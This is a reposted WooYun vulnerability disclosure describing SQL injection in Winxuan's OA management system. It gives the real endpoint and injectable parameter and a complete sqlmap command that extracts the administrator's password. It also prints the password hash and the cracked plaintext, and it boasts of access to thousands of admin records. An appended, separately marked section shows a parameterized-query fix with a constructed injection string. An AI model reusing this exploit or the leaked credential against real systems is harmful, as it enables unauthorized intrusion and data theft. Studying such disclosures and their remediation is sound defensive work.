神刀安全网

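Vulnerability title: SQL injection in a management system of Winxuan (文轩网) (a bloodbath triggered by a garbage bag / large amounts of data / multiple administrator accounts / internal information / over a thousand administrators / internal documents / sensitive information)

Vulnerability details

Disclosure status:

2016-05-03: Details reported to the vendor; awaiting vendor handling
2016-05-09: The vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

When I went downstairs today I took out the trash on the way, and while throwing it out I found a packaging bag with 文轩网 (Winxuan) printed on it. So I came back and did some testing, and did not expect it to set off one bloodbath after another.

Detailed description:

When I went downstairs today I took out the trash on the way, and while throwing it out I found a packaging bag with 文轩网 (Winxuan) printed on it. So I came back and did some testing, and did not expect it to set off one bloodbath after another.

Code block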
oa.winxuan.com

Code block
http://oa.winxuan.com/ServiceAction/com.velcro.base.GetDataAction?action=checkname&formid=1

The formid parameter is injectable.

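350 databases. Because sqlmap could not display them directly, I went through the logs and arranged them by hand one by one; give me 20 points just for that dedication.

Code block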
JSP
back-end DBMS: Oracle
Database: OAUSER

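Because there are so many tables, I did not know which one holds the administrator accounts. A query statement can be run directly in sqlmap.

The default administrator is sysadmin

Code block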
C:/Python27/sqlmap>sqlmap.py -u "http://oa.winxuan.com/ServiceAction/com.velcro.
base.GetDataAction?action=checkname&formid=1" -p formid --tamper=space2comment -
-batch -D zuzhibu -T sysuser --sql-query "select logonpass from sysuser where lo
ngonname='sysadmin'"

Code block
e3570e9e977fabb2ac818edc9a6a2e38

After decryption it is asdlkj321

Back-end administration information for 5000 people

An elementary school management system, where videos can be watched, and so on.

A large amount of sensitive information

Stopping here without going any further, mwah

Proof of vulnerability:

Stopping here without going any further, mwah

Remediation:
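The report gives no remediation, so this added example (not part of the original report and not the vendor's code) shows the usual fix for an injectable numeric parameter such as formid: allow-list validation plus a bind variable, next to the concatenating "before" form. Assumptions: sqlite3 stands in for the Oracle back end, the table `demo_forms` and all function names are hypothetical, and formid is taken to be a decimal integer as in the report's `formid=1`.

```python
import re
import sqlite3

def make_db():
    # Constructed stand-in data; table and column names are hypothetical.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE demo_forms (id INTEGER PRIMARY KEY, objname TEXT)")
    db.executemany("INSERT INTO demo_forms VALUES (?, ?)",
                   [(1, "leave_request"), (2, "expense_claim"), (3, "hr_private")])
    return db

def checkname_vulnerable(db, formid):
    # "Before": the request parameter is concatenated into the statement,
    # so whatever it contains is parsed as SQL.
    sql = "SELECT objname FROM demo_forms WHERE id = " + formid
    return [row[0] for row in db.execute(sql)]

# ASCII digits only, bounded length; fullmatch also rejects trailing newlines.
FORMID_RE = re.compile(r"[0-9]{1,9}")

def checkname_hardened(db, formid):
    # "After": allow-list the parameter, then pass it as a bind variable so
    # it can only ever be a value, never part of the statement text.
    if not isinstance(formid, str) or not FORMID_RE.fullmatch(formid):
        raise ValueError("formid must be a decimal integer")
    cur = db.execute("SELECT objname FROM demo_forms WHERE id = ?", (int(formid),))
    return [row[0] for row in cur]

def demo():
    db = make_db()
    # Constructed input: SQL comments take the place of spaces, so a filter
    # that only strips or blocks whitespace would not stop it.
    crafted = "1/**/OR/**/1=1"
    leaked = checkname_vulnerable(db, crafted)
    try:
        checkname_hardened(db, crafted)
        rejected = False
    except ValueError:
        rejected = True
    return leaked, rejected, checkname_hardened(db, "2")

if __name__ == "__main__":
    print(demo())
```

On a JSP/Oracle stack the same pattern is a `PreparedStatement` with `setInt`, combined with a database account for the web tier that can read only the tables the endpoint needs.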

Copyright notice: when reposting, please credit the source DeadSea@乌云 (WooYun)
